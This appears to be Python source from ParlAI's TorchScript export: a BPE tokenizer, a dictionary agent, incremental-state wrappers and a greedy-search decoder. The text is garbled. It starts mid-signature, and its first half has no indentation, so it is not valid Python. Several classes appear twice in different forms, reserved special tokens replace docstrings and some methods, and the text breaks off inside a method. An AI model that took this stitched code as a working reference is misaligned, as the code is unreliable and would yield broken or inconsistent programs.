ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:
Dict[str, str], bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
self._unk_token_idx = self.tok2ind[self.unk_token]
self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=
bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=
bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens)
def _word_lookup(self, key: str) ->int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) ->str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) ->List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) ->List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) ->List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) ->str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseIncrStateFlattener(nn.Module):
<|reserved_special_token_0|>
def __init__(self, module: nn.Module):
super().__init__()
self.module = module
def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]
) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:
"""
Unflatten the input incremental state.
For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in
structured_incr_state[0]['self_attn']['prev_key'].
"""
structured_incr_state = defaultdict(lambda : defaultdict(dict))
for key, state in flat_incr_state.items():
layer_idx_str, attn_type, state_type = key.split('__')
structured_incr_state[int(layer_idx_str)][attn_type][state_type
] = state
return dict({k: dict(v) for k, v in structured_incr_state.items()})
def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,
Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:
"""
Flatten the input incremental state.
For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
in flat_incr_state['layer_0__self_attn__prev_key'].
"""
flat_incr_state = {}
for layer_idx, dict1 in structured_incr_state.items():
for attn_type, dict2 in dict1.items():
for state_type, state in dict2.items():
key = f'{layer_idx:d}__{attn_type}__{state_type}'
flat_incr_state[key] = state
return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .forward().
"""
def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.
Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.
Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
if flat_incr_state is not None:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
else:
structured_incr_state = None
tensor, new_structured_incr_state = self.module.forward(input=
input_, encoder_state=encoder_state, incr_state=
structured_incr_state)
new_flat_incr_state = self._flatten_incr_state(
new_structured_incr_state)
return tensor, new_flat_incr_state
class ModelIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .reorder_decoder_incremental_state(). We also support .output(), which is also
traced.
"""
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
    """
    Builds and/or loads a dictionary.

    All code is TorchScriptable.
    """

    def __init__(
        self,
        null_token: str,
        end_token: str,
        unk_token: str,
        start_token: str,
        freq: Dict[str, int],
        tok2ind: Dict[str, int],
        ind2tok: Dict[int, str],
        bpe_add_prefix_space: bool,
        bpe_encoder: Dict[str, str],
        bpe_byte_encoder: Dict[int, str],
        fused_key_bpe_ranks: Dict[str, float],
        special_tokens: List[str],
    ):
        # Special-token strings.
        self.null_token = null_token
        self.end_token = end_token
        self.unk_token = unk_token
        self.start_token = start_token
        # Token statistics and the two-way token <-> index maps.
        self.freq = freq
        self.tok2ind = tok2ind
        self.ind2tok = ind2tok
        # Cache the UNK index so out-of-vocabulary lookups are a single read.
        self._unk_token_idx = self.tok2ind[self.unk_token]
        # BPE tokenizer used by (bpe_)tokenize().
        self.bpe = ScriptableGpt2BpeHelper(
            add_prefix_space=bpe_add_prefix_space,
            encoder=bpe_encoder,
            byte_encoder=bpe_byte_encoder,
            fused_key_bpe_ranks=fused_key_bpe_ranks,
            special_tokens=special_tokens,
        )

    def _word_lookup(self, key: str) -> int:
        """
        Return the index for a token, falling back to the UNK index.
        """
        if key not in self.tok2ind:
            return self._unk_token_idx
        return self.tok2ind[key]

    def _index_lookup(self, key: int) -> str:
        """
        Return the token for an index, falling back to the UNK token.
        """
        if key not in self.ind2tok:
            return self.unk_token
        return self.ind2tok[key]

    def gpt2_tokenize(self, text: str):
        """
        Tokenize using Gpt2 BPE tokenizer.
        """
        return self.bpe_tokenize(text)

    def tokenize(self, text: str) -> List[str]:
        """
        Return a sequence of tokens from the input text.

        Special tokens are handled by the underlying BPE tokenizer.
        """
        return self.gpt2_tokenize(text)

    def bpe_tokenize(self, text: str) -> List[str]:
        """
        Return a sequence of BPE-tokens from the text.
        """
        return self.bpe.encode(text)

    def txt2vec(self, text: str) -> List[int]:
        """
        Convert a string to a vector (list of ints).

        First runs a sentence tokenizer, then a word tokenizer.
        """
        indices: List[int] = []
        for tok in self.tokenize(str(text)):
            indices.append(self._word_lookup(tok))
        return indices

    def vec2txt(self, vector: List[int]) -> str:
        """
        Convert a vector of token IDs back into a string.
        """
        token_strs: List[str] = []
        for idx in vector:
            token_strs.append(self._index_lookup(idx))
        return self.bpe.decode(token_strs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TorchScriptGreedySearch(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    def __init__(self, agent: TorchAgent):
        """
        Build a scriptable greedy-search wrapper around a trained agent.

        Copies the dictionary and history settings out of the agent, then
        traces the encoder, both decoder passes, and the output/reorder
        methods with TorchScript.
        """
        super().__init__()
        self.is_bart = agent.opt['model'] == 'bart'
        # We only support the specific dictionary settings listed in
        # CAIRAOKE_DICT_PARAMS.
        for key, val in self.CAIRAOKE_DICT_PARAMS.items():
            assert agent.opt.get(key, val
                ) == val, f'The only currently supported value of "{key}" is {val}!'
        orig_dict: DictionaryAgent = agent.dict
        orig_bpe: Gpt2BpeHelper = orig_dict.bpe
        assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())
        assert not any(i for key in orig_bpe.bpe_ranks.keys() for i in key if
            '\n' in i
            ), "We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!"
        # Fuse each (first, second) BPE-rank key into a single '\n'-joined
        # string, and cast the values to float (comparable to float('inf')),
        # so the dict is a TorchScript-legal Dict[str, float].
        fused_key_bpe_ranks = {'\n'.join(key): float(val) for key, val in
            orig_bpe.bpe_ranks.items()}
        # TorchScriptable re-implementation of the dictionary agent.
        self.dict = ScriptableDictionaryAgent(null_token=orig_dict.
            null_token, end_token=orig_dict.end_token, unk_token=orig_dict.
            unk_token, start_token=orig_dict.start_token, freq=orig_dict.
            freq, tok2ind=orig_dict.tok2ind, ind2tok=orig_dict.ind2tok,
            bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],
            bpe_encoder=orig_bpe.encoder, bpe_byte_encoder=orig_bpe.
            byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
            special_tokens=agent._get_special_tokens())
        # History tracking and start/end token settings copied from the agent.
        self.delimiter_tok = agent.history.delimiter_tok
        self.history_size = agent.opt['history_size']
        if agent.opt.get('history_add_global_end_token', None) is not None:
            self.global_end_token = agent.dict[agent.dict.end_token]
        else:
            self.global_end_token = None
        self.text_truncate = agent.opt.get('text_truncate') or agent.opt[
            'truncate']
        self.text_truncate = (self.text_truncate if self.text_truncate >= 0
             else None)
        self.start_idx = agent.model.START_IDX
        self.end_idx = agent.model.END_IDX
        self.null_idx = agent.model.NULL_IDX
        # BART decoding starts from [END, START]; other models from [START].
        if self.is_bart:
            self.initial_decoder_input = [self.end_idx, self.start_idx]
        else:
            self.initial_decoder_input = [self.start_idx]
        agent.model.eval()
        # Wrappers that flatten the nested incremental-state dict into the
        # Dict[str, Tensor] form that TorchScript tracing requires.
        wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)
        wrapped_model = ModelIncrStateFlattener(agent.model)
        # Sample inputs for tracing the encoder and both decoder passes.
        sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)
        encoder_states = agent.model.encoder(sample_tokens)
        initial_generations = self._get_initial_decoder_input(sample_tokens)
        latent, initial_incr_state = wrapped_decoder(initial_generations,
            encoder_states)
        logits = agent.model.output(latent[:, -1:, :])
        _, preds = logits.max(dim=2)
        # Clone the initial incremental state so the reorder call below does
        # not mutate the copy used when tracing
        # .reorder_decoder_incremental_state().
        incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}
        incr_state = wrapped_model.reorder_decoder_incremental_state(incr_state
            , torch.tensor([0], dtype=torch.long, device=sample_tokens.device))
        generations = torch.cat([initial_generations, preds], dim=1)
        # Trace the encoder, the first decoder pass (no incremental state),
        # the output/reorder methods, and a later decoder pass.
        # strict=False avoids errors when a Dict is returned from forward().
        self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)
        self.decoder_first_pass = torch.jit.trace(wrapped_decoder, (
            initial_generations, encoder_states), strict=False)
        self.partially_traced_model = torch.jit.trace_module(wrapped_model,
            {'output': latent[:, -1:, :],
            'reorder_decoder_incremental_state': (initial_incr_state, torch
            .tensor([0], dtype=torch.long, device=sample_tokens.device))},
            strict=False)
        self.decoder_later_pass = torch.jit.trace(wrapped_decoder, (
            generations, encoder_states, incr_state), strict=False)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    def forward(self, context: str, max_len: int=128) ->str:
        """
        Greedily decode a response to the given newline-delimited context.

        :param context:
            dialogue history, one utterance per line
        :param max_len:
            maximum number of tokens to generate
        :return:
            the decoded label string
        """
        # Vectorize each line of the (possibly size-limited) history.
        history_vecs: List[List[int]] = []
        context_lines = context.split('\n')
        if self.history_size > 0:
            context_lines = context_lines[-self.history_size:]
        for line in context_lines:
            history_vecs.append(self.parse(line))
        # Join the history lines with the delimiter token(s).
        text_vecs: List[List[int]] = []
        for vec in history_vecs[:-1]:
            text_vecs += [vec]
            text_vecs += [self.delimiter_tok]
        text_vecs += [history_vecs[-1]]
        if self.global_end_token is not None:
            text_vecs += [[self.global_end_token]]
        # Flatten into a single token-id list.
        flattened_text_vec: List[int] = []
        for vec in text_vecs:
            for token in vec:
                flattened_text_vec.append(token)
        # Truncate from the left, leaving room for BART's start/end tokens.
        if self.text_truncate is not None:
            if self.is_bart:
                truncate_length = self.text_truncate - 2
            else:
                truncate_length = self.text_truncate
            if len(flattened_text_vec) > truncate_length:
                flattened_text_vec = flattened_text_vec[-truncate_length:]
        flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)
        if self.is_bart:
            # BART wraps the input in start/end tokens.
            flattened_text_vec = torch.cat([torch.tensor([self.start_idx],
                dtype=torch.long), flattened_text_vec, torch.tensor([self.
                end_idx], dtype=torch.long)], dim=0)
        # Encode once, then decode greedily token by token.
        batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0)
        encoder_states = self.encoder(batch_text_vec)
        generations = self._get_initial_decoder_input(batch_text_vec)
        # Track which sequences have emitted the end token, for early exit.
        seen_end = torch.zeros(batch_text_vec.size(0), device=
            batch_text_vec.device, dtype=torch.bool)
        incr_state: Dict[str, torch.Tensor] = {}
        for token_idx in range(max_len):
            if token_idx == 0:
                # First pass has no incremental state yet.
                latent, incr_state = self.decoder_first_pass(generations,
                    encoder_states)
            else:
                latent, incr_state = self.decoder_later_pass(generations,
                    encoder_states, incr_state)
            logits = self.partially_traced_model.output(latent[:, -1:, :])
            _, preds = logits.max(dim=2)
            incr_state = (self.partially_traced_model.
                reorder_decoder_incremental_state(incr_state, torch.tensor(
                [0], dtype=torch.long, device=batch_text_vec.device)))
            seen_end = seen_end + (preds == self.end_idx).squeeze(1)
            generations = torch.cat([generations, preds], dim=1)
            if torch.all(seen_end):
                break
        if self.is_bart:
            # Drop the initial end token that BART generation begins with.
            assert generations[0, 0].item() == self.end_idx
            generations = generations[:, 1:]
        generation_tokens: List[int] = generations[0].tolist()
        label = self._v2t(generation_tokens)
        return label
class BaseIncrStateFlattener(nn.Module):
    """
    Flatten/unflatten the incremental state for use with TorchScripting.

    The incremental state is natively a Dict[int, Dict[str, Dict[str,
    torch.Tensor]]] whose three levels map decoder layer, attention type, and
    previous key/value/mask. TorchScript, however, requires incremental-state
    inputs to be of type Dict[str, torch.Tensor], so this base class converts
    between that flat form (keys like '0__self_attn__prev_key') and the
    nested form. Subclasses call these helpers as the state passes into and
    out of their own methods.
    """

    def __init__(self, module: nn.Module):
        super().__init__()
        self.module = module

    def _unflatten_incr_state(
        self, flat_incr_state: Dict[str, torch.Tensor]
    ) -> Dict[int, Dict[str, Dict[str, torch.Tensor]]]:
        """
        Unflatten the input incremental state.

        For instance, flat_incr_state['0__self_attn__prev_key'] ends up at
        nested[0]['self_attn']['prev_key'].
        """
        nested: Dict[int, Dict[str, Dict[str, torch.Tensor]]] = {}
        for flat_key, state in flat_incr_state.items():
            layer_str, attn_type, state_type = flat_key.split('__')
            per_layer = nested.setdefault(int(layer_str), {})
            per_layer.setdefault(attn_type, {})[state_type] = state
        return nested

    def _flatten_incr_state(
        self, structured_incr_state: Dict[int, Dict[str, Dict[str, torch.Tensor]]]
    ) -> Dict[str, torch.Tensor]:
        """
        Flatten the input incremental state.

        For instance, nested[0]['self_attn']['prev_key'] ends up at
        flat_incr_state['0__self_attn__prev_key'].
        """
        return {
            f'{layer_idx:d}__{attn_type}__{state_type}': state
            for layer_idx, attn_dict in structured_incr_state.items()
            for attn_type, state_dict in attn_dict.items()
            for state_type, state in state_dict.items()
        }
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
    """
    Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.

    The flat incremental state is unflattened before the wrapped module's
    .forward() runs and the updated state is flattened again on the way out.
    """

    def forward(
        self,
        input_: torch.LongTensor,
        encoder_state: Tuple[torch.Tensor, torch.Tensor],
        flat_incr_state: Optional[Dict[str, torch.Tensor]] = None,
    ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
        # First decoder pass has no incremental state at all.
        nested_state = (
            None
            if flat_incr_state is None
            else self._unflatten_incr_state(flat_incr_state)
        )
        tensor, new_nested_state = self.module.forward(
            input=input_, encoder_state=encoder_state, incr_state=nested_state
        )
        return tensor, self._flatten_incr_state(new_nested_state)
class ModelIncrStateFlattener(BaseIncrStateFlattener):
    """
    Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.

    The flat state is unflattened before .reorder_decoder_incremental_state()
    runs and flattened again afterwards. .output() is also exposed here
    because it is traced as well.
    """

    def reorder_decoder_incremental_state(
        self, flat_incr_state: Dict[str, torch.Tensor], inds: torch.Tensor
    ) -> Dict[str, torch.Tensor]:
        nested_state = self._unflatten_incr_state(flat_incr_state)
        reordered = self.module.reorder_decoder_incremental_state(
            incremental_state=nested_state, inds=inds
        )
        return self._flatten_incr_state(reordered)

    def output(self, tensor: torch.Tensor) -> torch.Tensor:
        return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
    """
    Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
    """

    @classmethod
    def findall(cls, text: str) -> List[str]:
        """
        Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
        """
        contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
        tokens: List[str] = []
        idx = 0
        num_passes = 0
        while idx < len(text):
            # Safety valve: every branch below should advance idx, but guard
            # against hanging forever if one ever fails to.
            num_passes += 1
            if num_passes > 10000:
                return [
                    '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
                ]
            if text[idx] == "'":
                # Capture contraction suffixes such as 's, 't, 're, etc.
                captured_suffix = False
                for ending in contraction_endings:
                    if text[idx + 1:idx + 1 + len(ending)] == ending:
                        tokens.append("'" + ending)
                        idx += 1 + len(ending)
                        captured_suffix = True
                        break
                if captured_suffix:
                    continue
            if not text[idx].isspace() or (
                text[idx] == ' '
                and idx + 1 < len(text)
                and not text[idx + 1].isspace()
            ):
                # A run of letters, digits, or other non-space characters,
                # optionally preceded by a single space.
                if text[idx] == ' ':
                    last_matching_idx = idx + 1
                else:
                    last_matching_idx = idx
                if text[last_matching_idx].isalpha():
                    while (
                        last_matching_idx + 1 < len(text)
                        and text[last_matching_idx + 1].isalpha()
                    ):
                        last_matching_idx += 1
                elif text[last_matching_idx].isnumeric():
                    while (
                        last_matching_idx + 1 < len(text)
                        and text[last_matching_idx + 1].isnumeric()
                    ):
                        last_matching_idx += 1
                else:
                    while (
                        last_matching_idx + 1 < len(text)
                        and not text[last_matching_idx + 1].isspace()
                        and not text[last_matching_idx + 1].isalpha()
                        and not text[last_matching_idx + 1].isnumeric()
                    ):
                        last_matching_idx += 1
                tokens.append(text[idx:last_matching_idx + 1])
                idx = last_matching_idx + 1
                continue
            if idx + 1 < len(text) and text[idx + 1].isspace():
                # A run of whitespace: emit all but the final space, which
                # prefixes the following token (unless we're at text end).
                last_space_idx = idx + 1
                while (
                    last_space_idx + 1 < len(text)
                    and text[last_space_idx + 1].isspace()
                ):
                    last_space_idx += 1
                if last_space_idx + 1 == len(text):
                    tokens.append(text[idx:last_space_idx + 1])
                    idx = last_space_idx + 1
                else:
                    tokens.append(text[idx:last_space_idx])
                    idx = last_space_idx
                continue
            # Remaining case: a trailing whitespace run (or single whitespace
            # character) with nothing non-space after it.
            last_space_idx = idx
            while (
                last_space_idx + 1 < len(text)
                and text[last_space_idx + 1].isspace()
            ):
                last_space_idx += 1
            tokens.append(text[idx:last_space_idx + 1])
            idx = last_space_idx + 1
        return tokens

    def __init__(
        self,
        add_prefix_space: bool,
        encoder: Dict[str, str],
        byte_encoder: Dict[int, str],
        fused_key_bpe_ranks: Dict[str, float],
        special_tokens: List[str],
    ):
        self.add_prefix_space = add_prefix_space
        self.encoder = encoder
        # Inverse of self.encoder, used for decoding.
        self.decoder: Dict[str, str] = {}
        for k, v in self.encoder.items():
            self.decoder[v] = k
        self.byte_encoder = byte_encoder
        # Inverse of self.byte_encoder.
        self.byte_decoder: Dict[str, int] = {}
        for k, v in self.byte_encoder.items():
            self.byte_decoder[v] = k
        # BPE merge ranks, with each pair fused into one '\n'-joined key so
        # the dict is a TorchScript-legal Dict[str, float].
        self.bpe_ranks = fused_key_bpe_ranks
        # TorchScript has no sets, so store special tokens as dict keys.
        self._special_tokens: Dict[str, int] = {}
        for st in special_tokens:
            self._special_tokens[st] = 1

    def encode(self, text: str) -> List[str]:
        """
        Tokenize text.

        Checks for add_prefix_space; handles accordingly.

        :param text:
            text to tokenize
        :return tokens:
            A list of tokens
        """
        if self.add_prefix_space:
            text = f' {text}'
        # Piece states: FINAL pieces are special tokens emitted verbatim;
        # SPLITABLE pieces still get BPE-encoded.
        FINAL = 1
        SPLITABLE = 0
        pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
        for special_token in self._special_tokens.keys():
            i = 0
            while i < len(pieces):
                subtext, status = pieces[i]
                if status == FINAL:
                    i += 1
                    continue
                split = subtext.split(special_token)
                if len(split) > 1:
                    # Replace this piece with alternating (text, special
                    # token) entries. Each split element j lands at offset
                    # 2*j, with the special token inserted just before it.
                    # (Fix: the previous indices scrambled the order when a
                    # special token occurred more than once in a piece.)
                    pieces.pop(i)
                    for j, piece in enumerate(split):
                        if j > 0:
                            pieces.insert(i + j * 2 - 1, (special_token, FINAL))
                        pieces.insert(i + j * 2, (piece, SPLITABLE))
                else:
                    i += 1
        output: List[str] = []
        for piece, state in pieces:
            if state == FINAL:
                output.append(piece)
            else:
                # Ordinary text: run the BPE tokenizer over it.
                output += self.helper_encode(piece)
        return output

    def get_pairs(self, word: List[str]) -> List[Tuple[str, str]]:
        """
        Return set of symbol pairs in a word.

        Word is represented as list of symbols (symbols being variable-length
        strings).

        :param word:
            word to symbolize
        :return pairs:
            set of tuples of symbols
        """
        pairs: List[Tuple[str, str]] = []
        prev_char = word[0]
        for char in word[1:]:
            pairs.append((prev_char, char))
            prev_char = char
        return pairs

    def bpe(self, word: List[str]) -> List[str]:
        """
        Convert token to BPE.

        :param word:
            list of tokens token to convert
        :return bpe_encoding:
            string bpe encoding
        """
        pairs = self.get_pairs(word)
        if len(pairs) == 0:
            return word
        while True:
            # Find the adjacent pair with the lowest (best) merge rank. Keys
            # of bpe_ranks are '\n'-fused pairs (see __init__).
            min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
            bigram = pairs[0]
            for pair in pairs[1:]:
                current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf'))
                if current_rank < min_rank:
                    min_rank = current_rank
                    bigram = pair
            if '\n'.join(bigram) not in self.bpe_ranks:
                # No mergeable pair left.
                break
            first, second = bigram
            new_word: List[str] = []
            i = 0
            while i < len(word):
                # Copy symbols up to the next occurrence of `first`.
                found = False
                for j in range(i, len(word)):
                    if word[j] == first:
                        new_word.extend(word[i:j])
                        i = j
                        found = True
                        break
                if not found:
                    new_word.extend(word[i:])
                    break
                if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
                    # Merge the bigram into a single symbol.
                    new_word.append(first + second)
                    i += 2
                else:
                    new_word.append(word[i])
                    i += 1
            word = new_word.copy()
